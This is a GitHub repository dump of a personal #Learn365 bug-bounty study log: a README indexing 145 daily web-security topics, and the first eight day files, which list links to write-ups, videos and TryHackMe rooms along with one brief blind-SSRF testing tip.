Repository: Imran407704/Learn365
Branch: main
Commit: 25a810c05267
Files: 146
Total size: 132.1 KB
Directory structure:
gitextract_nhcxwvz6/
├── README.md
└── Resources/
├── Day 01 Task.md
├── Day 02 Task.md
├── Day 03 Task.md
├── Day 04 Task.md
├── Day 05 Task.md
├── Day 06 Task.md
├── Day 07 Task.md
├── Day 08 Task.md
├── Day 09 Task.md
├── Day 10 Task.md
├── Day 100 Task.md
├── Day 101 Task.md
├── Day 102 Task.md
├── Day 103 Task.md
├── Day 104 Task.md
├── Day 105 Task.md
├── Day 106 Task.md
├── Day 107 Task.md
├── Day 108 Task.md
├── Day 109 Task.md
├── Day 11 Task.md
├── Day 110 Task.md
├── Day 111 Task.md
├── Day 112 Task.md
├── Day 113 Task.md
├── Day 114 Task.md
├── Day 115 Task.md
├── Day 116 Task.md
├── Day 117 Task.md
├── Day 118 Task.md
├── Day 119 Task.md
├── Day 12 Task.md
├── Day 120 Task.md
├── Day 121 Task.md
├── Day 122 Task.md
├── Day 123 Task.md
├── Day 124 Task.md
├── Day 125 Task.md
├── Day 126 Task.md
├── Day 127 Task.md
├── Day 128 Task.md
├── Day 129 Task.md
├── Day 13 Task.md
├── Day 130 Task.md
├── Day 131 Task.md
├── Day 132 Task.md
├── Day 133 Task.md
├── Day 134 Task.md
├── Day 135 Task.md
├── Day 136 Task.md
├── Day 137 Task.md
├── Day 138 Task.md
├── Day 139 Task.md
├── Day 14 Task.md
├── Day 140 Task.md
├── Day 141 Task.md
├── Day 142 Task.md
├── Day 143 Task.md
├── Day 144 Task.md
├── Day 145 Task.md
├── Day 15 Task.md
├── Day 16 Task.md
├── Day 17 Task.md
├── Day 18 Task.md
├── Day 19 Task.md
├── Day 20 Task.md
├── Day 21 Task.md
├── Day 22 Task.md
├── Day 23 Task.md
├── Day 24 Task.md
├── Day 25 Task.md
├── Day 26 Task.md
├── Day 27 Task.md
├── Day 28 Task.md
├── Day 29 Task.md
├── Day 30 Task.md
├── Day 31 Task.md
├── Day 32 Task.md
├── Day 33 Task.md
├── Day 34 Task.md
├── Day 35 Task.md
├── Day 36 Task.md
├── Day 37 Task.md
├── Day 38 Task.md
├── Day 39 Task.md
├── Day 40 Task.md
├── Day 41 Task.md
├── Day 42 Task.md
├── Day 43 Task.md
├── Day 44 Task.md
├── Day 45 Task.md
├── Day 46 Task.md
├── Day 47 Task.md
├── Day 48 Task.md
├── Day 49 Task.md
├── Day 50 Task.md
├── Day 51 Task.md
├── Day 52 Task.md
├── Day 53 Task.md
├── Day 54 Task.md
├── Day 55 Task.md
├── Day 56 Task.md
├── Day 57 Task.md
├── Day 58 Task.md
├── Day 59 Task.md
├── Day 60 Task.md
├── Day 61 Task.md
├── Day 62 Task.md
├── Day 63 Task.md
├── Day 64 Task.md
├── Day 65 Task.md
├── Day 66 Task.md
├── Day 67 Task.md
├── Day 68 Task.md
├── Day 69 Task.md
├── Day 70 Task.md
├── Day 71 Task.md
├── Day 72 Task.md
├── Day 73 Task.md
├── Day 74 Task.md
├── Day 75 Task.md
├── Day 76 Task.md
├── Day 77 Task.md
├── Day 78 Task.md
├── Day 79 Task.md
├── Day 80 Task.md
├── Day 81 Task.md
├── Day 82 Task.md
├── Day 83 Task.md
├── Day 84 Task.md
├── Day 85 Task.md
├── Day 86 Task.md
├── Day 87 Task.md
├── Day 88 Task.md
├── Day 89 Task.md
├── Day 90 Task.md
├── Day 91 Task.md
├── Day 92 Task.md
├── Day 93 Task.md
├── Day 94 Task.md
├── Day 95 Task.md
├── Day 96 Task.md
├── Day 97 Task.md
├── Day 98 Task.md
└── Day 99 Task.md
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
[#Learn365](https://twitter.com/search?q=%23learn365&src=typeahead_click)
The purpose of the [#Learn365](https://twitter.com/search?q=%23learn365&src=typeahead_click) collection is to create informational content in multiple formats and share it with the community to enable knowledge creation and learning.
Inspired by [@harshbothra_](https://twitter.com/harshbothra_)
## Resources
| Days | Topic |
| ----------------- | ------------------------------------------------------------------ |
| Day 1 | [SSRF,RedTeam](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2001%20Task.md) |
| Day 2 | [SSRF,RedTeam,THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2002%20Task.md) |
| Day 3 | [SSRF,RedTeam,THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2003%20Task.md) |
| Day 4 | [Broken Link Hijacking, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2004%20Task.md) |
| Day 5 | [Blind XSS,THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2005%20Task.md) |
| Day 6 | [log4j, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2006%20Task.md) |
| Day 7 | [Password Reset link not expire, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2007%20Task.md) |
| Day 8 | [DMARC, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2008%20Task.md) |
| Day 9 | [CSRF, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2009%20Task.md) |
| Day 10 | [Clickjacking, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2010%20Task.md) |
| Day 11 | [Live Bug Hunting, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2011%20Task.md) |
| Day 12 | [Bug Bounty Wordlist, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2012%20Task.md) |
| Day 13 |[OWASP Web Application Security Testing, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2013%20Task.md) |
| Day 14 |[4.1.2 OWASP Fingerprint Web Server, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2014%20Task.md) |
| Day 15 |[4.1.3 OWASP Review Webserver Metafiles for Information Leakage, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2015%20Task.md) |
| Day 16 |[4.1.4 Enumerate Applications on Webserver](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2016%20Task.md) |
| Day 17 |[4.1.5 Review Webpage Content for Information Leakage, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2017%20Task.md) |
| Day 18 |[4.1.6 Identify Application Entry Points](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2018%20Task.md) |
| Day 19 |[4.1.7 Map Execution Paths Through Application, Github Recon](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2019%20Task.md) |
| Day 20 |[4.1.8 Fingerprint Web Application Framework, Recon Techniques](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2020%20Task.md) |
| Day 21 |[4.1.9,10 Map Application Architecture, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2021%20Task.md) |
| Day 22 |[4.2 Configuration and Deployment Management Testing, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2022%20Task.md) |
| Day 23 |[4.2.2 Test Application Platform Configuration, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2023%20Task.md) |
| Day 24 |[4.2.3 Test File Extensions Handling for Sensitive Information, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2024%20Task.md) |
| Day 25 |[4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2025%20Task.md) |
| Day 26 |[4.2.5 Enumerate Infrastructure and Application Admin Interfaces, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2026%20Task.md) |
| Day 27 |[4.2.6 Test HTTP Methods (with Video), THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2027%20Task.md) |
| Day 28 |[4.2.7 Test HTTP Strict Transport Security (HSTS), THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2028%20Task.md) |
| Day 29 |[4.2.8 Test RIA Cross Domain Policy, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2029%20Task.md) |
| Day 30 |[4.2.9 Test File Permission, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2030%20Task.md) |
| Day 31 |[4.2.10 Test for Subdomain Takeover, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2031%20Task.md) |
| Day 32 |[4.2.11 Test Cloud Storage, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2032%20Task.md) |
| Day 33 |[4.2.12 Test for Content Security Policy, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2033%20Task.md) |
| Day 34 |[4.3.1 Test Role Definitions, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2034%20Task.md) |
| Day 35 |[4.3.2 Test User Registration Process](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2035%20Task.md) |
| Day 36 |[4.3.3 Test Account Provisioning Process](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2036%20Task.md) |
| Day 37 |[4.3.4 Testing for Account Enumeration and Guessable User Account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2037%20Task.md) |
| Day 38 |[4.3.5 Testing for Weak or Unenforced Username Policy, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2038%20Task.md) |
| Day 39 |[4.4.1 Testing for Credentials Transported over an Encrypted Channel](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2039%20Task.md) |
| Day 40 |[4.4.2 Testing for Default Credentials](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2040%20Task.md) |
| Day 41 |[CSRF](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2041%20Task.md) |
| Day 42 |[Open Redirect](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2042%20Task.md) |
| Day 43 |[log4j](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2043%20Task.md) |
| Day 44 |[JWT attacks](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2044%20Task.md) |
| Day 45 |[Content Discovery](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2045%20Task.md) |
| Day 46 |[Idor](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2046%20Task.md) |
| Day 47 |[Account takeover](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2047%20Task.md) |
| Day 48 |[RCE on a Java Web Application](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2048%20Task.md) |
| Day 49 |[Dependency Confusion](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2049%20Task.md) |
| Day 50 |[Automate Blind XSS](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2050%20Task.md) |
| Day 51 |[Finding And Exploiting S3 Amazon Buckets For Bug Bounties](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2051%20Task.md) |
| Day 52 |[Web Cache Poisoning attack](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2052%20Task.md) |
| Day 53 |[Unique Case for Price Manipulation](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2053%20Task.md) |
| Day 54 |[Account takeover via the Password Reset Functionality](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2054%20Task.md) |
| Day 55 |[API Token Hijacking Through Clickjacking, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2055%20Task.md)|
| Day 56 |[API Exploitation --→ Business Logic Bug](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2056%20Task.md) |
| Day 57 |[Attended Infosec Community Conference on : Android Static Analysis](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2057%20Task.md) |
| Day 58 |[Finding bugs on NFT website for fun & Profit by zseano](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2058%20Task.md) |
| Day 59 |[EXIF Geolocation Data Not Stripped From Uploaded Images](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2059%20Task.md) |
| Day 60 |[Thick Client Pentesting](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2060%20Task.md) |
| Day 61 |[Conduct a Penetration Test Like a Pro in 6 Phases](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2061%20Task.md) |
| Day 62 |[Firewall Penetration Testing](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2062%20Task.md) |
| Day 63 |[Host Discovery & Vulnerability Scanning With Nessus](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2063%20Task.md) |
| Day 64 |[AWS Web Application Firewall (WAF), 5 Exercise Pentesterlabs](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2064%20Task.md) |
| Day 65 |[Introduction To Pentesting - Enumeration, 6 Pentesterlab Exercise](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2065%20Task.md) |
| Day 66 |[Bypassing CSRF Protection, 5 Pentesterlab Exercise](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2066%20Task.md) |
| Day 67 |[HTML Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2067%20Task.md) |
| Day 68 |[Exploiting SQL Injection, Completed Pentesterlab Unix Badge](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2068%20Task.md) |
| Day 69 |[A Weird Price Tampering Vulnerability, Security Operations Center (SOC)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2069%20Task.md) |
| Day 70 |[A Summary of OAuth 2.0 Attack Methods](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2070%20Task.md) |
| Day 71 |[6 Methods to bypass CSRF protection on a web application](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2071%20Task.md) |
| Day 72 |[Two-factor authentication security testing and possible bypasses](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2072%20Task.md) |
| Day 73 |[10 Types of Web Vulnerabilities that are Often Missed, Understanding BOLA](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2073%20Task.md) |
| Day 74 |[My First Bug Bounty: SQL Injection, SQL INJECTION VULNERABILITY](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2074%20Task.md) |
| Day 75 |[Dank Writeup On Broken Access Control, Bug bounty tips for broken access control on BurpSuite Part 1](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2075%20Task.md) |
| Day 76 |[SSRF in PDF Renderer using SVG, Bypassing 2FA using OpenID Misconfiguration](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2076%20Task.md) |
| Day 77 |[Easy IDOR hunting with Autorize?, HOW I hacked thousand of subdomains](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2077%20Task.md) |
| Day 78 |[A business logic error bug worth 600$, 5 Methods to bypass Authentication (OTP)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2078%20Task.md) |
| Day 79 |[How did I earn €€€€ by breaking the back-end logic of the server, How to find IDOR Privilege escalation](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2078%20Task.md) |
| Day 80 |[Account Takeover via Web Cache Poisoning based Reflected XSS, A Pentester's Guide to Server Side Template Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2080%20Task.md) |
| Day 81 |[Account Takeover: From zero to System Admin using basic skills, Apache Example Servlet leads to $$$$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2081%20Task.md) |
| Day 82 |[The easiest $2500 I got it from bug bounty program, A Pentester’s Guide to File Inclusion](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2082%20Task.md) |
| Day 83 |[How I bypassed disable_functions in php to get a remote shell, JWTs - Patterns & Anti-patterns](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2083%20Task.md) |
| Day 84 |[Finding Your Next Bug: GraphQL, No Rate Limit - 2K$ Bounty](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2084%20Task.md) |
| Day 85 |[Facebook email disclosure and account takeover, How to learn anything in Computer Science or Cybersecurity](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2085%20Task.md) |
| Day 86 |[Hacking banks with race conditions, Exploiting a Race Condition Vulnerability](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2086%20Task.md) |
| Day 87 |[A Comprehensive Guide to Broken Access Control, Never leave this tip while you hunting Broken Access Control, POC](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2087%20Task.md) |
| Day 88 |[A Journey from IDOR to Account Takeover, Exploiting open redirect - Whitelist bypass using Salesforce environment](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2088%20Task.md) |
| Day 89 |[Union Based SQL Injection — Bug Hunting, Bypass confirmation to add payment method](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2089%20Task.md) |
| Day 90 |[Exploiting cross-site scripting in Referer header, XSS via X-Forwarded-Host header](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2090%20Task.md) |
| Day 91 |[How I bypassed 403 forbidden domain using a simple trick, Deleting account via support ticket](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2091%20Task.md) |
| Day 92 |[Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite, WordPress < 5.8.3 - Object Injection Vulnerability](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2092%20Task.md) |
| Day 93 |[0-day Cross Origin Request Forgery vulnerability in Grafana 8.x](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2093%20Task.md) |
| Day 94 |[GOT ACCESS TO DOTA 2 ADMIN PANEL BY EXPLOITING IN-GAME FEATURE](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2094%20Task.md) |
| Day 95 |[How I escalated RFI into LFI](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2095%20Task.md) |
| Day 96 |[Stumbling upon a new way to exploit authorization bypass in Jira](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2096%20Task.md) |
| Day 97 |[Clickjacking on Google MyAccount Worth 7,500$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2097%20Task.md) |
| Day 98 |[Info Disclosure and SQLi Writeup](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2098%20Task.md) |
| Day 99 |[CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2099%20Task.md) |
| Day 100 |[RCE with Flask Jinja Template Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20100%20Task.md) |
| Day 101 |[How I could have hacked your Uber account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20101%20Task.md) |
| Day 102 |[Bug Bounty Live Recon - Linked / JS Discovery!](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20102%20Task.md) |
| Day 103 |[HTTP Request Smuggling on business.apple.com and Others](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20103%20Task.md) |
| Day 104 |[SVG SSRFs and saga of bypasses, A Detailed Guide on Cewl](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20104%20Task.md) |
| Day 105 |[How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20105%20Task.md) |
| Day 106 |[XSS , HTML Injection and File Upload Bypass in HUAWEI Subdomain](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20106%20Task.md) |
| Day 107 |[How Token Misconfiguration can lead to takeover account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20107%20Task.md) |
| Day 108 |[How to hack any Payment Gateway?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20108%20Task.md) |
| Day 109 |[Race Condition bypassing team limit](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20109%20Task.md) |
| Day 110 |[Bypass Apple Corp SSO on Apple Admin Panel](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20110%20Task.md) |
| Day 111 |[The Unusual Case of Status code- 301 Redirection to AWS Security Credentials Compromise](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20111%20Task.md) |
| Day 112 |[Find security bugs while you sleep! Using nuclei templates, and more..](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20112%20Task.md) |
| Day 113 |[Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20113%20Task.md) |
| Day 114 |[Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20114%20Task.md) |
| Day 115 |[How I chained two vulnerabilities to steal credit card details?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20115%20Task.md) |
| Day 116 |[How I Made The BBC Hall Of Fame 3 Times](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20116%20Task.md) |
| Day 117 |[Improper cookie not expiring after logged out!](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20117%20Task.md) |
| Day 118 |[Open-Redirects, What you doing wrong when you fail at bug bounties?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20118%20Task.md) |
| Day 119 |[Bypassing WAF for $2222](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20119%20Task.md) |
| Day 120 |[Subdomain Takeover using Mobile??](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20120%20Task.md) |
| Day 121 |[Fuzzing and credentials leakage..awesome bug hunting writeup](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20121%20Task.md) |
| Day 122 |[OTP bypass with response manipulation.](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20122%20Task.md) |
| Day 123 | There is no task Today Enjoy Eid Festival 🥳😊😃 |
| Day 124 |[An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20124%20Task.md) |
| Day 125 |[How I got a lousyT-Shirt from the Dutch Government.](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20125%20Task.md) |
| Day 126 |[Hack the HAckers](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20126%20Task.md) |
| Day 127 |[The $16,000 Dev Mistake](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20127%20Task.md) |
| Day 128 |[Denial of Service through …](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20128%20Task.md) |
| Day 129 |[How i found a vulnerability that leads to access any users’ sensitive data and got $500](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20129%20Task.md) |
| Day 130 |[ToolTime - Cloud Recon 1](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20130%20Task.md) |
| Day 131 |[A Fun SSRF through a Headless Browser](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20131%20Task.md) |
| Day 132 |[2FA Bypass in PickMyCareer.in](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20132%20Task.md) |
| Day 133 |[Exploiting Google Maps API keys for profit](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20133%20Task.md) |
| Day 134 |[Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20134%20Task.md) |
| Day 135 |[I have 1% chance to hack this company](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20135%20Task.md) |
| Day 136 |[HTTP Request Smuggling: Part-1 (Concepts)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20136%20Task.md) |
| Day 137 |[Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20137%20Task.md) |
| Day 138 |[Can analyzing javascript files lead to remote code execution?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20138%20Task.md) |
| Day 139 |[My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees Information's & In Some cases Passwords At More Than 1000 Companies](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20139%20Task.md) |
| Day 140 |[Origin IP found, WAF Cloudflare Bypass](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20140%20Task.md) |
| Day 141 |[MFA (Multi-Factor Authentication)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20141%20Task.md) |
| Day 142 |[Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20142%20Task.md) |
| Day 143 |[Does ms15–034 still exist today ?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20143%20Task.md) |
| Day 144 |[How I managed to take over any account visits my profile with Stored XSS](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20144%20Task.md) |
| Day 145 |[The Bucket’s Got a Hole in it](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20145%20Task.md) |
================================================
FILE: Resources/Day 01 Task.md
================================================
Day 1 Task
Writeup :- SSRF
https://infosecwriteups.com/story-of-a-really-cool-ssrf-bug-cf88a3800efc
https://medium.com/@shahjerry33/blind-ssrf-the-hide-seek-game-da9d0ecef2fb
SSRF Tip by Shah Jerry
When testing for Blind SSRF it is common that you’ll find a DNS lookup for the given Burp Collaborator domain, but no HTTP request. This happens because the application
attempted to make an HTTP request to the domain, which caused the initial DNS lookup, but the actual HTTP request was blocked by network-level filtering. If you find only
the DNS lookup or DNS query then it is not a vulnerability; it is mandatory to have the HTTP response, which will make it a valid vulnerability.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Red Team :- https://youtu.be/EIHLXWnK1Dw by
@HackerSploit
================================================
FILE: Resources/Day 02 Task.md
================================================
Day 2 Task
Red Team :
What is MITRE ATT&CK? MITRE ATT&CK Framework by
https://youtube.com/watch?v=IsPArM8xKAM @Infosec_Train
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
SSRF : https://medium.com/@rafaelrodripaz/ssrf-in-import-file-function-d0f1c6397262
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739?source=user_profile---------1-------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
THM room :https://tryhackme.com/room/redteamrecon
================================================
FILE: Resources/Day 03 Task.md
================================================
Day 3 Task
SSRF Poc
https://youtube.com/playlist?list=PL9VLN4DOjAsjjAZiPf_vbGp9eGufX7lKY
eJPT resources by
[@grumpzsux](https://twitter.com/grumpzsux)
https://github.com/grumpzsux/eJPT-Notes/
THM room
https://tryhackme.com/room/phishingemails1tryoe
Red Team by
[@q0phi80](https://twitter.com/q0phi80)
from 00:00:00 to 00:59:59
https://youtube.com/watch?v=OtcP8c4wZys
Red team Passive Recon Resources
https://phonebook.cz
https://zoomeye.org
https://spyse.com
https://shodan.io
https://hunter.io
================================================
FILE: Resources/Day 04 Task.md
================================================
🎯 Day 4 Task
✅ Broken link Hijacking
https://www.youtube.com/watch?v=o1RCqBiyoZ0
https://www.youtube.com/watch?v=eOoW9dQC6ps
https://www.youtube.com/watch?v=dpwoIrO3GFw
Blog
https://edoverflow.com/2017/broken-link-hijacking/
https://medium.com/@iamtess5277/what-is-broken-link-hijacking-o-o-872d821da6fd
Tool
https://www.brokenlinkcheck.com/broken-links.php#
https://github.com/stevenvachon/broken-link-checker
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
✅ THM room by [TryHackMe](https://tryhackme.com/)
https://tryhackme.com/room/phishingemails2rytmuv
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Github Link
https://github.com/Imran407704/Learn365
#infosec #learn365 #redteam #bugbounty
================================================
FILE: Resources/Day 05 Task.md
================================================
🎯 Day 5 Task
✅ Blind XSS
https://infosecwriteups.com/blind-xss-for-beginners-c88e48083071
https://medium.com/@newp_th/how-i-find-blind-xss-vulnerability-in-redacted-com-33af18b56869
https://ashketchum.medium.com/blind-xss-in-google-analytics-admin-panel-3133-70-2185d1cce82a
https://medium.com/@renwa/new-technique-to-find-blind-xss-c2efcd377cc2
https://medium.com/@jr.mayank1999/exploiting-blind-xss-with-burp-collaborator-client-fec38b5fc5e
https://www.youtube.com/watch?v=GcznQUsNW3s by [@thecyberzeel](https://www.youtube.com/c/SpinTheHack)
https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/edit#slide=id.gb07b8690e7_0_156
by [@0xAwali](https://twitter.com/0xAwali)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
https://tryhackme.com/room/ice -
from Connect to Gain Access
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 06 Task.md
================================================
🎯 Day 6 Task
✅ log4j
https://infosecwriteups.com/facts-to-clear-about-log4j-for-bug-bounty-hunters-f58e04eb025
https://akashpatil.me/log4j-guide-book.html by [@skypatil98](https://twitter.com/skypatil98)
✅ Youtube Video
https://www.youtube.com/watch?v=d9eejFgdXCc
https://www.youtube.com/watch?v=5PhYLpHFgfc
https://www.youtube.com/watch?v=w2F67LbEtnk
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
✅ THM Room
https://tryhackme.com/room/nmap01
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 07 Task.md
================================================
🎯 Day 7 Task
✅ Password Reset Link not expiring
https://shahjerry33.medium.com/password-reset-link-doesnt-expires-on-email-change-39aec24fbed4
https://hackerone.com/reports/685007
https://hackerone.com/reports/898841
✅ Youtube Video
https://www.youtube.com/watch?v=7sx-_qwlt6Q
https://www.youtube.com/watch?v=58Cpt1tzm-w
https://www.youtube.com/watch?v=ZPYwWlTBWJ0
✅ THM Room
https://tryhackme.com/room/windowsfundamentals1xbx
#bugbounty #infosec #learn365
================================================
FILE: Resources/Day 08 Task.md
================================================
🎯 Day 8 Task
✅ How to report DMARC?
